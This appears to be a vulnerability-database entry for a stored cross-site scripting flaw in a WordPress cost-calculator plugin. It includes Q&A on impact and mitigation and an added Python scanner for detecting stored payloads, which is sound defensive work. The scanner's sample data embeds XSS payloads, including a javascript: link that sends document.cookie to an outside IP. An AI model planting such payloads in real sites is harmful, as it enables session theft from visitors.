CVE-2026-24630
BaseFortify
Publication date: 2026-01-23
Last updated on: 2026-04-23
Assigner: Patchstack
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| patchstack | stylish_cost_calculator | up to and including 8.1.8 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-24630 is a stored cross-site scripting (XSS) vulnerability (CWE-79) in the Stylish Cost Calculator WordPress plugin, affecting versions up to and including 8.1.8. The plugin places user-controllable input into pages it generates without neutralizing it, so an attacker can store a script payload that later executes in the browsers of other visitors to the affected pages. According to the advisory, exploitation requires a privileged account (Contributor or Developer) and interaction with a crafted link, page, or form. [1]
How can this vulnerability impact me?
An injected script runs in visitors' browsers in the context of your site's origin. The advisory describes the likely outcomes as unwanted redirects, injected advertisements, or other harmful HTML payloads. Because exploitation requires a privileged account plus user interaction, and the advisory rates the impact as low, the likelihood of exploitation is reduced. No official fix was available at the time this entry was last updated. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
There is no network signature specific to this CVE. Because the flaw is stored XSS, the evidence is the payload itself in the plugin's persisted data: review the plugin's input fields and the values it stores (wherever the plugin persists them, such as wp_posts, wp_options, or its own tables) for script tags, event-handler attributes such as onerror= or onload=, or javascript: URLs, bearing in mind that a payload may be HTML-entity- or URL-encoded. Complement this with a review of web server logs for unusual requests to the plugin's admin endpoints, and with an authenticated XSS scan of the plugin's pages. [1]
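The following script is an added example of the manual data review described above; it is not part of the BaseFortify entry, the advisory, or the plugin. It assumes you have already exported candidate values as (location, value) pairs (for instance with WP-CLI's `wp db query` against the tables the plugin writes to) and that the access log is in the common/combined format. The location labels and log lines embedded below are constructed sample data, not real plugin rows.

```python
"""Heuristic scan for stored-XSS payloads in exported plugin data and access logs.

Added example, not code from the plugin or the advisory. The indicator list is
deliberately broad; tune it to the plugin's legitimate markup before relying on it.
"""
import html
import re
from urllib.parse import unquote

# Indicators that a value meant to be plain text (a label, a title, a price)
# carries active content. Each entry is (name, compiled pattern).
XSS_INDICATORS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("active-element", re.compile(
        r"<\s*(iframe|svg|img|object|embed|math|video|audio|details|body)\b", re.I)),
    ("event-handler", re.compile(
        r"\bon(abort|blur|change|click|dblclick|error|focus|input|keydown|keypress|keyup"
        r"|load|mousedown|mousemove|mouseout|mouseover|mouseup|pointer\w*|reset|resize"
        r"|scroll|select|submit|toggle|unload|wheel|animation\w*|transition\w*)\s*=", re.I)),
    ("javascript-url", re.compile(r"javascript\s*:", re.I)),
    ("data-html-url", re.compile(r"data\s*:\s*text/html", re.I)),
]


def normalize(value: str, rounds: int = 3) -> str:
    """Undo URL and HTML-entity encoding (repeated, to catch double encoding)
    and drop NUL bytes, so encoded payloads match the same patterns as plain ones."""
    current = value
    for _ in range(rounds):
        decoded = html.unescape(unquote(current)).replace("\x00", "")
        if decoded == current:
            break
        current = decoded
    return current


def classify(value: str) -> list:
    """Return the names of every indicator that matches the normalized value."""
    text = normalize(value)
    return [name for name, pattern in XSS_INDICATORS if pattern.search(text)]


def scan_entries(entries) -> list:
    """entries: iterable of (location, value). Returns (location, indicators, value)
    for every value that trips at least one indicator."""
    findings = []
    for location, value in entries:
        hits = classify(value)
        if hits:
            findings.append((location, hits, value))
    return findings


# Request line of a common/combined format access log entry.
LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def scan_log_lines(lines) -> list:
    """Flag requests whose URI, once decoded, contains an XSS indicator.
    Only the URI is visible here; POST bodies need the WAF or application log."""
    findings = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        hits = classify(m.group("uri"))
        if hits:
            findings.append((m.group("method"), m.group("uri"), hits))
    return findings


# Constructed sample data: the location labels are hypothetical, not the plugin's schema.
SAMPLE_ENTRIES = [
    ("calculator:3:title", "Kitchen Remodel Estimate"),
    ("calculator:3:description",
     "Get a quote&lt;img src=x onerror=alert(document.cookie)&gt;"),   # entity-encoded
    ("calculator:5:button_label", "Email me the total"),
    ("calculator:7:currency_note", "Prices in <b>USD</b>"),            # harmless markup
    ("wp_posts:12:post_content",
     "Click <a href=\"javascript:fetch('//203.0.113.7/?c='+document.cookie)\">here</a>"),
]

# Constructed sample log lines; the admin page name is a placeholder.
SAMPLE_LOG = [
    '198.51.100.4 - - [23/Jan/2026:10:01:02 +0000] "GET /?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jan/2026:10:02:17 +0000] "GET /wp-admin/admin.php?page=example'
    '&title=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for location, hits, value in scan_entries(SAMPLE_ENTRIES):
        print(f"[data] {location}: {hits}: {value!r}")
    for method, uri, hits in scan_log_lines(SAMPLE_LOG):
        print(f"[log]  {method} {uri}: {hits}")
```

A hit is a lead, not proof: confirm each finding by viewing the rendered page as a low-privilege visitor and checking whether the markup is actually emitted unescaped.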
What immediate steps should I take to mitigate this vulnerability?
Until a fixed version is released: restrict who holds the Contributor or Developer roles and audit the accounts that already have them; review and sanitize the data already stored by the Stylish Cost Calculator plugin for injected markup; and consider deactivating or removing the plugin. A web application firewall rule set that blocks common XSS payloads reduces, but does not eliminate, the risk. Administrators should also avoid following untrusted links to the site's pages or forms. [1]